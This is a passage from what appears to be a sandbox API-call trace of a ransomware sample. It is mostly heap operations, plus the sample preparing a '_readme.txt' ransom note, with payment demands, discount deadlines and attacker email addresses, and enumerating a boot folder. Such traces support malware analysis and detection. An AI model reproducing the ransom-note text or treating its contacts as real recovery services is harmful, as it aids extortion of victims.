(HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.709] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0183.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.709] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.710] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.710] PathFindFileNameW (pszPath="") returned="" [0183.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.710] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.710] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.711] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.711] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.711] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0183.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.711] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0183.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.712] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.712] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.712] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.715] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.716] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.716] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.716] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.716] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.717] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.719] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.720] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.721] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.722] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: 